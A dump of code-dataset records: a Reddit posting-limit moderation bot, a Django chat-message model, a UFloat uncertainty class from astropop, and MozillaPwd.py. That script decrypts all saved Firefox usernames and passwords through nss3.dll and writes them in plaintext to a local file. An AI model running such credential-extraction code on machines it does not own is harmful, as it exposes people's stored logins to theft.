search_time = submission_pool[0].created_utc
# These start newest first. We want oldest first
new_submissions.reverse()
break
if len(new_submissions) > 0:
dotter.reset()
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(search_time))
logging.info("- New submission count is %d since %s", len(new_submissions),
stamp)
for submission in new_submissions:
# Announce to discord
send_discord_webhook(submission)
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(submission.created_utc))
link = 'https://redd.it/' + submission.id
logging.info('-- New post: %s, "%s" by "%s", %s', stamp,
submission.title, submission.author.name, link)
try:
check_post_limits(submission, post_limit_hours,
post_limit_count)
except praw.exceptions.APIException as e:
logging.error('API Exception!')
pprint(vars(e))
break
else:
search_time = submission.created_utc
else:
#search_time = time.time()
dotter.dot()
try:
time.sleep(loop_delay)
except KeyboardInterrupt:
print ('..exiting')
sys.exit(0)
def check_post_limits(orig_submission, limit_hours, limit_posts):
buffer_seconds = 600
start_time = (orig_submission.created_utc
- (limit_hours * 60 * 60)
+ buffer_seconds)
username = orig_submission.author.name
subreddit = orig_submission.subreddit
search_submissions = filter_submissions(submission_pool, start_time,
orig_submission.created_utc, username)
count = len(search_submissions)
for i, s in enumerate(search_submissions, 1):
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(s.created_utc))
link = 'https://redd.it/' + s.id
logging.info('Post history (%d/%d): %s, "%s", %s', i, count, stamp,
s.title, link)
# Include the excluded post
count += 1
logging.info('%d hour post count: %d', limit_hours, count)
if count > limit_posts and POST_TEST_MODE:
logging.info('Test mode is ON. Post not removed.')
elif count > limit_posts and not POST_TEST_MODE:
try:
orig_submission.mod.remove()
except Exception as e:
# If the login user isn't permitted to remove posts, don't stop
if e.response.status_code == 403:
logging.error('The current username does not have permission '
'to remove submissions! Verify the login '
'is correct and has subreddit mod access.')
else:
raise e
else:
name = "u/" + orig_submission.author.name
logging.info('"%s" removed.', orig_submission.title)
msg_link = "/message/compose/?to=/" + subreddit._path
reply_text = (
"Hi " + name + ",\n\n"
"Your submission was automatically removed because you have "
"exceeded **{}** submissions within the last **{}** hours.\n\n"
"*I am a bot, and this action was performed automatically. "
"Please [contact the moderators of this subreddit]"
"(" + msg_link + ") if you have questions or "
"concerns.*").format(limit_posts, limit_hours)
notification = orig_submission.reply(reply_text)
notification.mod.distinguish('yes')
def send_discord_webhook(submission):
if not DISCORD_WEBHOOK_URL:
return
import json
import requests
stamp = time.strftime("%Y-%m-%dT%H:%M:%SZ",
time.gmtime(submission.created_utc))
author = '[{}](https://www.reddit.com/u/{})'.format(submission.author.name,
submission.author.name)
data = {'embeds':
[{
'title': submission.title,
'url': 'https://www.reddit.com'+submission.permalink,
'timestamp': stamp,
'fields': [
{
'name': 'Author',
'value': author,
'inline': 'true'
},
{
'name': 'Image URL',
'value': submission.url,
'inline': 'true'
}
],
'image': {
'url': submission.url
}
}]
}
while True:
response = requests.post(
DISCORD_WEBHOOK_URL, data=json.dumps(data),
headers = {'Content-Type': 'application/json'}
)
if response.status_code != 204:
logging.error('Request to discord returned error %s, response is: %s'
% (response.status_code, response.text))
time.sleep(10)
continue
break
class Dotter:
"""Show time passing with easy to read symbols."""
def __init__(self, seconds = 120):
self.count = 0
self.seconds_per_dot = seconds
def reset(self):
if self.count > 0:
self.count = 0
print('')
def dot(self):
self.count = self.count + 1
minutes = self.count * self.seconds_per_dot / 60
if minutes % 60 == 0:
sys.stdout.write('^')
elif minutes % 30 == 0:
sys.stdout.write('!')
elif minutes % 15 == 0:
sys.stdout.write('+')
elif minutes % 10 == 0:
sys.stdout.write(':')
else:
sys.stdout.write('.')
sys.stdout.flush()
if __name__ == '__main__':
main() | enforce_posting_limits.py | import sys
import time
import logging
import praw
import prawcore
from pprint import pprint
submission_pool = []
# Set to True to test, posts won't be removed
POST_TEST_MODE = False
# Set to a discord webhook for announcements
DISCORD_WEBHOOK_URL = None
def main():
# SET THESE - reddit application configuration
user_agent = ''
client_id = ''
client_secret = ''
username = ''
password = ''
# SET THESE - Customize these for your subreddit.
subreddit_name = ''
post_limit_count = 4
post_limit_hours = 24
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s',
level=logging.INFO
)
reddit = praw.Reddit(user_agent=user_agent,
client_id=client_id,
client_secret=client_secret,
username=username,
password=password)
logging.info('Watching subreddit: %s', subreddit_name)
logging.info('Current limit set to %d posts in %d hours',
post_limit_count, post_limit_hours)
subreddit = reddit.subreddit(subreddit_name)
check_subreddit(subreddit, post_limit_count, post_limit_hours)
def filter_submissions(submissions, start_time, end_time = None, username = None):
"""Return all submissions created after the start_time.
Optional: Also before end_time if given.
Optional: Also by username if given."""
filtered = []
for s in submissions:
if end_time and s.created_utc >= end_time:
continue
elif username and username != s.author.name:
continue
elif s.created_utc > start_time:
filtered.append(s)
return filtered
def check_subreddit(subreddit, post_limit_count, post_limit_hours):
global submission_pool
max_new_submissions = 100
loop_delay = 119 # seconds
# Initial search range will start 10m ago.
#search_time = time.time() - (60*60*6)
# The loop
running = True
dotter = Dotter(120)
while running:
while True:
submission_pool = []
try:
submissions = subreddit.new(limit=max_new_submissions)
except praw.exceptions.APIException as e:
logging.error('API Exception!')
pprint(vars(e))
logging.info('Retrying in 60 seconds.')
time.sleep(60)
except praw.exceptions.ClientException as e:
logging.error('Client Exception!')
pprint(vars(e))
logging.info('Retrying in 60 seconds.')
time.sleep(60)
except prawcore.exceptions.OAuthException as e:
logging.critical('Login failed.')
sys.exit(1)
except Exception as e:
pprint(vars(e))
time.sleep(120)
else:
for s in submissions:
submission_pool.append(s)
if search_time:
new_submissions = filter_submissions(submission_pool, search_time)
else:
new_submissions = [ submission_pool[0] ]
search_time = submission_pool[0].created_utc
# These start newest first. We want oldest first
new_submissions.reverse()
break
if len(new_submissions) > 0:
dotter.reset()
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(search_time))
logging.info("- New submission count is %d since %s", len(new_submissions),
stamp)
for submission in new_submissions:
# Announce to discord
send_discord_webhook(submission)
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(submission.created_utc))
link = 'https://redd.it/' + submission.id
logging.info('-- New post: %s, "%s" by "%s", %s', stamp,
submission.title, submission.author.name, link)
try:
check_post_limits(submission, post_limit_hours,
post_limit_count)
except praw.exceptions.APIException as e:
logging.error('API Exception!')
pprint(vars(e))
break
else:
search_time = submission.created_utc
else:
#search_time = time.time()
dotter.dot()
try:
time.sleep(loop_delay)
except KeyboardInterrupt:
print ('..exiting')
sys.exit(0)
def check_post_limits(orig_submission, limit_hours, limit_posts):
buffer_seconds = 600
start_time = (orig_submission.created_utc
- (limit_hours * 60 * 60)
+ buffer_seconds)
username = orig_submission.author.name
subreddit = orig_submission.subreddit
search_submissions = filter_submissions(submission_pool, start_time,
orig_submission.created_utc, username)
count = len(search_submissions)
for i, s in enumerate(search_submissions, 1):
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(s.created_utc))
link = 'https://redd.it/' + s.id
logging.info('Post history (%d/%d): %s, "%s", %s', i, count, stamp,
s.title, link)
# Include the excluded post
count += 1
logging.info('%d hour post count: %d', limit_hours, count)
if count > limit_posts and POST_TEST_MODE:
logging.info('Test mode is ON. Post not removed.')
elif count > limit_posts and not POST_TEST_MODE:
try:
orig_submission.mod.remove()
except Exception as e:
# If the login user isn't permitted to remove posts, don't stop
if e.response.status_code == 403:
logging.error('The current username does not have permission '
'to remove submissions! Verify the login '
'is correct and has subreddit mod access.')
else:
raise e
else:
name = "u/" + orig_submission.author.name
logging.info('"%s" removed.', orig_submission.title)
msg_link = "/message/compose/?to=/" + subreddit._path
reply_text = (
"Hi " + name + ",\n\n"
"Your submission was automatically removed because you have "
"exceeded **{}** submissions within the last **{}** hours.\n\n"
"*I am a bot, and this action was performed automatically. "
"Please [contact the moderators of this subreddit]"
"(" + msg_link + ") if you have questions or "
"concerns.*").format(limit_posts, limit_hours)
notification = orig_submission.reply(reply_text)
notification.mod.distinguish('yes')
def send_discord_webhook(submission):
if not DISCORD_WEBHOOK_URL:
return
import json
import requests
stamp = time.strftime("%Y-%m-%dT%H:%M:%SZ",
time.gmtime(submission.created_utc))
author = '[{}](https://www.reddit.com/u/{})'.format(submission.author.name,
submission.author.name)
data = {'embeds':
[{
'title': submission.title,
'url': 'https://www.reddit.com'+submission.permalink,
'timestamp': stamp,
'fields': [
{
'name': 'Author',
'value': author,
'inline': 'true'
},
{
'name': 'Image URL',
'value': submission.url,
'inline': 'true'
}
],
'image': {
'url': submission.url
}
}]
}
while True:
response = requests.post(
DISCORD_WEBHOOK_URL, data=json.dumps(data),
headers = {'Content-Type': 'application/json'}
)
if response.status_code != 204:
logging.error('Request to discord returned error %s, response is: %s'
% (response.status_code, response.text))
time.sleep(10)
continue
break
class Dotter:
"""Show time passing with easy to read symbols."""
def __init__(self, seconds = 120):
self.count = 0
self.seconds_per_dot = seconds
def reset(self):
if self.count > 0:
self.count = 0
print('')
def dot(self):
self.count = self.count + 1
minutes = self.count * self.seconds_per_dot / 60
if minutes % 60 == 0:
sys.stdout.write('^')
elif minutes % 30 == 0:
sys.stdout.write('!')
elif minutes % 15 == 0:
sys.stdout.write('+')
elif minutes % 10 == 0:
sys.stdout.write(':')
else:
sys.stdout.write('.')
sys.stdout.flush()
if __name__ == '__main__':
main() | 0.319334 | 0.080177 |
from django.db import models
import logging
import datetime
from wi_model_util.imodel import *
from mongoengine import *
from base.settings import CHATPAMONGO
from app.util.messageque.msgsender import MessageSender
from app.customer.models.user import User
from app.util.shumeitools.shumeitools import *
connect(CHATPAMONGO.db, host=CHATPAMONGO.host, port=CHATPAMONGO.port, username=CHATPAMONGO.username,
password=<PASSWORD>)
class ChatMessage(Document):
from_user_id = IntField(verbose_name=u"用户id")
to_user_id = IntField(verbose_name=u"接收用户id")
create_time = DateTimeField(verbose_name=u"创建时间", default=datetime.datetime.now())
type = IntField(verbose_name=u"消息类型") # 1:文本 2:图片 3: 音频
content = StringField(max_length=1024, verbose_name=u"消息内容")
conversation_id = StringField(verbose_name=u"会话id", max_length=64)
resource_url = StringField(verbose_name=u"图片,音频 资源地址", max_length=512)
show_status = IntField(verbose_name=u"图片,音频 鉴定状态") # 1:通过 2:屏蔽 3:鉴定中
@classmethod
def create_chat_message(cls, from_user_id, to_user_id, type, content, conversation_id, resource_url, user_ip):
obj_ = cls()
obj_.from_user_id = from_user_id
obj_.to_user_id = to_user_id
obj_.type = type
obj_.content = content
obj_.create_time = datetime.datetime.now()
obj_.conversation_id = conversation_id
obj_.resource_url = resource_url
if int(type) == 2:
obj_.show_status = 3
else:
obj_.show_status = 1
if int(type) == 1:
# 文本内容鉴黄
user = User.objects.filter(id=from_user_id).first()
ret, duration = shumei_text_spam(text=content, timeout=1, user_id=from_user_id, channel="MESSAGE", nickname=user.nickname,
phone=user.phone, ip=user_ip)
is_pass = 0
if ret["code"] == 1100:
if ret["riskLevel"] == "PASS":
is_pass = 1
obj_.show_status = 1
if ret["riskLevel"] == "REJECT":
is_pass = 0
obj_.show_status = 2
if ret["riskLevel"] == "REVIEW":
# todo +人工审核逻辑
is_pass = 1
obj_.show_status = 1
obj_.save()
if not is_pass:
message = u"经系统检测,您的内容涉及违规因素,请重新编辑"
return 2, None, None, message
# 改变会话状态:
status = 0
create_time = None
conversation = UserConversation.objects.filter(id=conversation_id).first()
con_type = conversation.type
now = datetime.datetime.now()
if con_type == 3:
# 道具阶段状态
conversation.update(set__type=2)
conversation.update(set__wait_time=now)
if con_type == 2:
# 查看对方是否有此会话的回复: 如果有, 变成建立状态
message = ChatMessage.objects.filter(conversation_id=conversation_id, from_user_id=to_user_id, to_user_id=from_user_id).first()
if message:
conversation.update(set__type=1)
conversation.update(set__start_time=now)
status = 1
create_time = now
if int(type) == 2:
# 图片鉴定
MessageSender.send_picture_detect(pic_url=resource_url, user_id=0, pic_channel=0, source=4, obj_id=str(obj_.id))
return status, create_time, conversation_id, ""
class UserConversation(Document):
from_user_id = IntField(verbose_name=u"用户id")
to_user_id = IntField(verbose_name=u"接收用户id")
send_id = IntField(verbose_name=u"道具使用 用户id")
create_time = DateTimeField(verbose_name=u"创建时间", default=datetime.datetime.now())
type = IntField(verbose_name=u"会话状态") # 1:建立 2:未建立 3:道具阶段 4:关闭
start_time = DateTimeField(verbose_name=u"会话开始时间")
stop_time = DateTimeField(verbose_name=u"会话关闭时间")
wait_time = DateTimeField(verbose_name=u"等待开始时间")
is_send_tool = IntField(verbose_name=u"是否使用道具") # 1:使用 2:未使用
tool_time_type = IntField(verbose_name=u"道具消耗的类型") # 0:限时 1:永久
stop_type = IntField(verbose_name=u"是否使用道具") # 1:到时关闭 2:取消操作
@classmethod
def create_conversation_message(cls, from_user_id, to_user_id, type, is_send_tool):
obj_ = cls()
obj_.from_user_id = from_user_id
obj_.to_user_id = to_user_id
obj_.type = type
obj_.is_send_tool = is_send_tool
obj_.create_time = datetime.datetime.now()
obj_.save()
return obj_
@classmethod
def cancel(cls, conversation_id, from_user_id, to_user_id):
conversation = cls.objects.filter(id=conversation_id, from_user_id=from_user_id, to_user_id=to_user_id).first()
rever_conversation = cls.objects.filter(id=conversation_id, from_user_id=to_user_id, to_user_id=from_user_id).first()
if conversation:
conversation.update(set__type=4)
conversation.update(set__stop_time=datetime.datetime.now())
conversation.update(set__stop_type=2)
if rever_conversation:
rever_conversation.update(set__type=4)
rever_conversation.update(set__stop_time=datetime.datetime.now())
rever_conversation.update(set__stop_type=2) | app/customer/models/chat.py |
from django.db import models
import logging
import datetime
from wi_model_util.imodel import *
from mongoengine import *
from base.settings import CHATPAMONGO
from app.util.messageque.msgsender import MessageSender
from app.customer.models.user import User
from app.util.shumeitools.shumeitools import *
connect(CHATPAMONGO.db, host=CHATPAMONGO.host, port=CHATPAMONGO.port, username=CHATPAMONGO.username,
password=<PASSWORD>)
class ChatMessage(Document):
from_user_id = IntField(verbose_name=u"用户id")
to_user_id = IntField(verbose_name=u"接收用户id")
create_time = DateTimeField(verbose_name=u"创建时间", default=datetime.datetime.now())
type = IntField(verbose_name=u"消息类型") # 1:文本 2:图片 3: 音频
content = StringField(max_length=1024, verbose_name=u"消息内容")
conversation_id = StringField(verbose_name=u"会话id", max_length=64)
resource_url = StringField(verbose_name=u"图片,音频 资源地址", max_length=512)
show_status = IntField(verbose_name=u"图片,音频 鉴定状态") # 1:通过 2:屏蔽 3:鉴定中
@classmethod
def create_chat_message(cls, from_user_id, to_user_id, type, content, conversation_id, resource_url, user_ip):
obj_ = cls()
obj_.from_user_id = from_user_id
obj_.to_user_id = to_user_id
obj_.type = type
obj_.content = content
obj_.create_time = datetime.datetime.now()
obj_.conversation_id = conversation_id
obj_.resource_url = resource_url
if int(type) == 2:
obj_.show_status = 3
else:
obj_.show_status = 1
if int(type) == 1:
# 文本内容鉴黄
user = User.objects.filter(id=from_user_id).first()
ret, duration = shumei_text_spam(text=content, timeout=1, user_id=from_user_id, channel="MESSAGE", nickname=user.nickname,
phone=user.phone, ip=user_ip)
is_pass = 0
if ret["code"] == 1100:
if ret["riskLevel"] == "PASS":
is_pass = 1
obj_.show_status = 1
if ret["riskLevel"] == "REJECT":
is_pass = 0
obj_.show_status = 2
if ret["riskLevel"] == "REVIEW":
# todo +人工审核逻辑
is_pass = 1
obj_.show_status = 1
obj_.save()
if not is_pass:
message = u"经系统检测,您的内容涉及违规因素,请重新编辑"
return 2, None, None, message
# 改变会话状态:
status = 0
create_time = None
conversation = UserConversation.objects.filter(id=conversation_id).first()
con_type = conversation.type
now = datetime.datetime.now()
if con_type == 3:
# 道具阶段状态
conversation.update(set__type=2)
conversation.update(set__wait_time=now)
if con_type == 2:
# 查看对方是否有此会话的回复: 如果有, 变成建立状态
message = ChatMessage.objects.filter(conversation_id=conversation_id, from_user_id=to_user_id, to_user_id=from_user_id).first()
if message:
conversation.update(set__type=1)
conversation.update(set__start_time=now)
status = 1
create_time = now
if int(type) == 2:
# 图片鉴定
MessageSender.send_picture_detect(pic_url=resource_url, user_id=0, pic_channel=0, source=4, obj_id=str(obj_.id))
return status, create_time, conversation_id, ""
class UserConversation(Document):
from_user_id = IntField(verbose_name=u"用户id")
to_user_id = IntField(verbose_name=u"接收用户id")
send_id = IntField(verbose_name=u"道具使用 用户id")
create_time = DateTimeField(verbose_name=u"创建时间", default=datetime.datetime.now())
type = IntField(verbose_name=u"会话状态") # 1:建立 2:未建立 3:道具阶段 4:关闭
start_time = DateTimeField(verbose_name=u"会话开始时间")
stop_time = DateTimeField(verbose_name=u"会话关闭时间")
wait_time = DateTimeField(verbose_name=u"等待开始时间")
is_send_tool = IntField(verbose_name=u"是否使用道具") # 1:使用 2:未使用
tool_time_type = IntField(verbose_name=u"道具消耗的类型") # 0:限时 1:永久
stop_type = IntField(verbose_name=u"是否使用道具") # 1:到时关闭 2:取消操作
@classmethod
def create_conversation_message(cls, from_user_id, to_user_id, type, is_send_tool):
obj_ = cls()
obj_.from_user_id = from_user_id
obj_.to_user_id = to_user_id
obj_.type = type
obj_.is_send_tool = is_send_tool
obj_.create_time = datetime.datetime.now()
obj_.save()
return obj_
@classmethod
def cancel(cls, conversation_id, from_user_id, to_user_id):
conversation = cls.objects.filter(id=conversation_id, from_user_id=from_user_id, to_user_id=to_user_id).first()
rever_conversation = cls.objects.filter(id=conversation_id, from_user_id=to_user_id, to_user_id=from_user_id).first()
if conversation:
conversation.update(set__type=4)
conversation.update(set__stop_time=datetime.datetime.now())
conversation.update(set__stop_type=2)
if rever_conversation:
rever_conversation.update(set__type=4)
rever_conversation.update(set__stop_time=datetime.datetime.now())
rever_conversation.update(set__stop_type=2) | 0.174551 | 0.087019 |
import base64
import configparser
import ctypes
import json
import os
SEC_SUCCESS = 0
SEC_FAILURE = -1
NssDll = None
ProfilePath = ''
JsonConfigPath = ''
OutputFilePath = ''
# 主密码
MasterPwd = ''
class SECItem(ctypes.Structure):
_fields_ = [
('type', ctypes.c_int),
('data', ctypes.c_char_p),
('len', ctypes.c_uint),
]
def InitNssDll(masterPwd):
path = ctypes.c_char_p()
path.value = ProfilePath.encode('utf-8')
mpwd = ctypes.c_char_p()
mpwd.value = masterPwd.encode('utf-8')
global NssDll
NssDll = ctypes.CDLL(r"nss3.dll")
if NssDll.NSS_Init(path) != SEC_SUCCESS:
print('NSS_Init failed')
return False
keySlot = NssDll.PK11_GetInternalKeySlot()
if keySlot == 0:
print('PK11_GetInternalKeySlot failed')
return False
if NssDll.PK11_CheckUserPassword(ctypes.c_int(keySlot), mpwd) != SEC_SUCCESS:
print('PK11_CheckUserPassword failed')
return False
if NssDll.PK11_Authenticate(keySlot, 1, 0) != SEC_SUCCESS:
print('PK11_Authenticate failed')
return False
return True
def LoadJsonPwdData():
entries = []
with open(JsonConfigPath, "r") as o:
js = json.load(o)
for i in range(len(js['logins'])):
entries.append({
'username':js['logins'][i]['encryptedUsername'],
'pwd':js['logins'][i]['encryptedPassword'],
'url':js['logins'][i]['hostname']})
return entries
def Decode(cipher):
data = base64.b64decode(cipher)
secItem = SECItem()
cipherItem = SECItem()
cipherItem.type = 0
cipherItem.data = data
cipherItem.len = len(data)
if NssDll.PK11SDR_Decrypt(ctypes.byref(cipherItem), ctypes.byref(secItem), 0) != SEC_SUCCESS:
print('PK11SDR_Decrypt failed')
raise
result = ctypes.string_at(secItem.data, secItem.len).decode('utf8')
return result
def DocodeEntry(entry):
try:
entry['username'] = Decode(entry['username'])
entry['pwd'] = Decode(entry['pwd'])
except:
print('Error when decode [ ' + entry['url'] + ' ]')
entry['username'] = '<Error>'
entry['pwd'] = '<Error>'
def DetermineProfileDirPath():
iniPath = os.path.join(os.environ['APPDATA'], r'Mozilla\Firefox\profiles.ini')
config = configparser.ConfigParser()
config.read(iniPath)
return os.path.join(os.environ['APPDATA'], r'Mozilla\Firefox', config['Profile0']['Path'])
def main():
global ProfilePath
global JsonConfigPath
global OutputFilePath
ProfilePath = DetermineProfileDirPath()
JsonConfigPath = os.path.join(ProfilePath, r'logins.json')
OutputFilePath = os.path.join(os.environ['USERPROFILE'], r'output.txt')
# 切换工作目录
os.chdir(os.path.join(os.environ['PROGRAMFILES(X86)'], r'Mozilla Firefox'))
if not InitNssDll(MasterPwd):
return
entries = LoadJsonPwdData()
for i in range(len(entries)):
DocodeEntry(entries[i])
with open(OutputFilePath, 'w') as o:
json.dump(entries, o, indent=1)
if __name__ == "__main__":
main() | MozillaPwd.py |
import base64
import configparser
import ctypes
import json
import os
SEC_SUCCESS = 0
SEC_FAILURE = -1
NssDll = None
ProfilePath = ''
JsonConfigPath = ''
OutputFilePath = ''
# 主密码
MasterPwd = ''
class SECItem(ctypes.Structure):
_fields_ = [
('type', ctypes.c_int),
('data', ctypes.c_char_p),
('len', ctypes.c_uint),
]
def InitNssDll(masterPwd):
path = ctypes.c_char_p()
path.value = ProfilePath.encode('utf-8')
mpwd = ctypes.c_char_p()
mpwd.value = masterPwd.encode('utf-8')
global NssDll
NssDll = ctypes.CDLL(r"nss3.dll")
if NssDll.NSS_Init(path) != SEC_SUCCESS:
print('NSS_Init failed')
return False
keySlot = NssDll.PK11_GetInternalKeySlot()
if keySlot == 0:
print('PK11_GetInternalKeySlot failed')
return False
if NssDll.PK11_CheckUserPassword(ctypes.c_int(keySlot), mpwd) != SEC_SUCCESS:
print('PK11_CheckUserPassword failed')
return False
if NssDll.PK11_Authenticate(keySlot, 1, 0) != SEC_SUCCESS:
print('PK11_Authenticate failed')
return False
return True
def LoadJsonPwdData():
entries = []
with open(JsonConfigPath, "r") as o:
js = json.load(o)
for i in range(len(js['logins'])):
entries.append({
'username':js['logins'][i]['encryptedUsername'],
'pwd':js['logins'][i]['encryptedPassword'],
'url':js['logins'][i]['hostname']})
return entries
def Decode(cipher):
data = base64.b64decode(cipher)
secItem = SECItem()
cipherItem = SECItem()
cipherItem.type = 0
cipherItem.data = data
cipherItem.len = len(data)
if NssDll.PK11SDR_Decrypt(ctypes.byref(cipherItem), ctypes.byref(secItem), 0) != SEC_SUCCESS:
print('PK11SDR_Decrypt failed')
raise
result = ctypes.string_at(secItem.data, secItem.len).decode('utf8')
return result
def DocodeEntry(entry):
try:
entry['username'] = Decode(entry['username'])
entry['pwd'] = Decode(entry['pwd'])
except:
print('Error when decode [ ' + entry['url'] + ' ]')
entry['username'] = '<Error>'
entry['pwd'] = '<Error>'
def DetermineProfileDirPath():
iniPath = os.path.join(os.environ['APPDATA'], r'Mozilla\Firefox\profiles.ini')
config = configparser.ConfigParser()
config.read(iniPath)
return os.path.join(os.environ['APPDATA'], r'Mozilla\Firefox', config['Profile0']['Path'])
def main():
global ProfilePath
global JsonConfigPath
global OutputFilePath
ProfilePath = DetermineProfileDirPath()
JsonConfigPath = os.path.join(ProfilePath, r'logins.json')
OutputFilePath = os.path.join(os.environ['USERPROFILE'], r'output.txt')
# 切换工作目录
os.chdir(os.path.join(os.environ['PROGRAMFILES(X86)'], r'Mozilla Firefox'))
if not InitNssDll(MasterPwd):
return
entries = LoadJsonPwdData()
for i in range(len(entries)):
DocodeEntry(entries[i])
with open(OutputFilePath, 'w') as o:
json.dump(entries, o, indent=1)
if __name__ == "__main__":
main() | 0.237576 | 0.080937 |
import copy
from astropy import units
import numpy as np
from ._deriv import numpy_ufunc_derivatives, math_derivatives
from ..py_utils import check_iterable
from ..logger import logger
__all__ = ['unit_property', 'UFloat', 'ufloat', 'units']
# pylint:disable=no-else-return,no-else-raise
def _filter_compatible(inp, cls, attr, else_None=False):
"""Filter common data structures compatible with UFloat."""
if else_None:
inp = tuple(getattr(x, attr) if isinstance(x, cls) else None
for x in inp)
else:
inp = tuple(getattr(x, attr) if isinstance(x, cls) else x
for x in inp)
return inp
def unit_property(cls):
"""Add a `unit` property to a class."""
def _unit_getter(self):
if self._unit is None: # noqa:W0212
return units.dimensionless_unscaled
return self._unit # noqa:W0212
def _unit_setter(self, value):
if value is None or units.Unit(value) == units.dimensionless_unscaled:
self._unit = None # noqa:W0212
else:
self._unit = units.Unit(value) # noqa:W0212
cls._unit = None # noqa:W0212
cls.unit = property(_unit_getter, _unit_setter,
doc="Physical unit of the data.")
return cls
@unit_property
class UFloat():
"""Storing float values with stddev uncertainties and units.
Parameters
----------
value : number or array_like
Nominal value(s) of the quantity.
uncertainty : number, array_like or `None` (optional)
Uncertainty value of the quantity. If `None`, the quantity will be
considered with no errors. Must match `value` shape.
unit : `~astropy.units.Unit` or string (optional)
The data unit. Must be `~astropy.units.Unit` compliant.
Notes
-----
- This class don't support memmapping. Is intended to be in memory ops.
- Units are handled by `~astropy.units`.
- Math operations cares about units and uncertainties.
"""
_nominal = None
_uncert = None
_unit = None
def __init__(self, value, uncertainty=None, unit=None):
self.nominal = value
self.uncertainty = uncertainty
self.unit = unit
def _set_uncert(self, value):
if value is None:
self._uncert = None
else:
if np.shape(value) != np.shape(self._nominal):
raise ValueError('Uncertainty with shape different from '
'nominal value: '
f'{np.shape(value)} '
f'{np.shape(self._nominal)}')
if check_iterable(self._nominal):
self._uncert = np.array(value)
else:
self._uncert = float(value)
def _set_nominal(self, value):
if value is None:
raise ValueError('Nominal value cannot be None')
self._nominal = value
self._uncert = None # always value is reset, uncertainty resets
# No unit changes
@property
def uncertainty(self):
"""Uncertainty of the quantity."""
if self._uncert is None:
if check_iterable(self._nominal):
return np.zeros_like(self._nominal)
else:
return 0.0
else:
return self._uncert
@uncertainty.setter
def uncertainty(self, value):
self._set_uncert(value)
@property
def nominal(self):
"""Nominal value of the quantity."""
return self._nominal
@nominal.setter
def nominal(self, value):
self._set_nominal(value)
def reset(self, value, uncertainty=None, unit=None):
"""Reset all the data.
Parameters
----------
value : number or array_like
Nominal value(s) of the quantity.
uncertainty : number, array_like or `None` (optional)
Uncertainty value of the quantity. If `None`, the quantity will be
considered with no errors. Must match `value` shape.
unit : `~astropy.units.Unit` or string (optional)
The data unit. Must be `~astropy.units.Unit` compliant.
"""
self.nominal = value
self.uncertainty = uncertainty
self.unit = unit
def __repr__(self):
ret = "< UFloat "
if check_iterable(self._nominal):
ret += str(np.shape(self._nominal))
else:
ret += str(self._nominal)
if self._uncert is not None:
ret += f"+-{self._uncert}"
ret += f" {self.unit} "
ret += " >"
return ret
def _compute_errors(self, derivs, inpnom, inpstd, **kwargs):
"""Compute the error components using func and derivatives."""
n_derivs = len(derivs) # number of expected numerical inputs?
# check if the number of inputs matches the number of derivs
if len(inpnom) != n_derivs or len(inpstd) != n_derivs:
raise ValueError('Inputs and derivatives have different number '
'of components')
axis = kwargs.get('axis')
if axis:
raise NotImplementedError('Not implemented for apply in axis.')
else:
components = [None]*n_derivs
for i in range(n_derivs):
components[i] = derivs[i](*inpnom)*inpstd[i]
return np.sqrt(np.sum(np.square(components)))
return None
def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
# TODO: check units across the inputs (including inside lists)
global logger
inpnom = copy.copy(inputs)
for c, a in zip([UFloat], ['nominal']):
# This allows more customization
inpnom = _filter_compatible(inputs, c, a)
inpstd = copy.copy(inputs)
for c, a in zip([UFloat], ['uncertainty']):
# This allows more customization
inpstd = _filter_compatible(inputs, c, a, else_None=True)
nkwargs = copy.copy(kwargs)
skwargs = copy.copy(kwargs)
if kwargs.get('out', ()):
nkwargs['out'] = _filter_compatible(nkwargs['out'],
UFloat, 'nominal')
skwargs['out'] = _filter_compatible(skwargs['out'],
UFloat, 'uncertainty',
else_None=True)
ufn = ufunc.__name__
nominal = getattr(ufunc, method)(*inpnom, **nkwargs)
if ufn in numpy_ufunc_derivatives:
std_func = numpy_ufunc_derivatives[ufn]
std = self._compute_errors(std_func, inpnom, inpstd, **skwargs)
else:
logger.warning("Function %s errors is not implemented.", ufn)
std = None
if isinstance(nominal, tuple):
if std is None:
std = [None]*len(nominal)
return tuple(UFloat(n, s, self.unit)
for n, s in zip(nominal, std))
elif method == 'at':
# no return value
return None
else:
# one return value
return UFloat(nominal, std, self.unit)
def ufloat(value, uncertainty=None, unit=None):
"""Create a UFloat quantity to handle operations. Just wrap UFloat
Parameters
----------
value : number or array_like
Nominal value(s) of the quantity.
uncertainty : number, array_like or `None` (optional)
Uncertainty value of the quantity. If `None`, the quantity will be
considered with no errors. Must match `value` shape.
unit : `~astropy.units.Unit` or string (optional)
The data unit. Must be `~astropy.units.Unit` compliant.
Returns
-------
q : `UFloat`
Quantity generated value, with uncertainty and unit.
"""
q = UFloat(value, uncertainty, unit)
return q | astropop/math/physical.py | import copy
from astropy import units
import numpy as np
from ._deriv import numpy_ufunc_derivatives, math_derivatives
from ..py_utils import check_iterable
from ..logger import logger
__all__ = ['unit_property', 'UFloat', 'ufloat', 'units']
# pylint:disable=no-else-return,no-else-raise
def _filter_compatible(inp, cls, attr, else_None=False):
"""Filter common data structures compatible with UFloat."""
if else_None:
inp = tuple(getattr(x, attr) if isinstance(x, cls) else None
for x in inp)
else:
inp = tuple(getattr(x, attr) if isinstance(x, cls) else x
for x in inp)
return inp
def unit_property(cls):
"""Add a `unit` property to a class."""
def _unit_getter(self):
if self._unit is None: # noqa:W0212
return units.dimensionless_unscaled
return self._unit # noqa:W0212
def _unit_setter(self, value):
if value is None or units.Unit(value) == units.dimensionless_unscaled:
self._unit = None # noqa:W0212
else:
self._unit = units.Unit(value) # noqa:W0212
cls._unit = None # noqa:W0212
cls.unit = property(_unit_getter, _unit_setter,
doc="Physical unit of the data.")
return cls
@unit_property
class UFloat():
"""Storing float values with stddev uncertainties and units.
Parameters
----------
value : number or array_like
Nominal value(s) of the quantity.
uncertainty : number, array_like or `None` (optional)
Uncertainty value of the quantity. If `None`, the quantity will be
considered with no errors. Must match `value` shape.
unit : `~astropy.units.Unit` or string (optional)
The data unit. Must be `~astropy.units.Unit` compliant.
Notes
-----
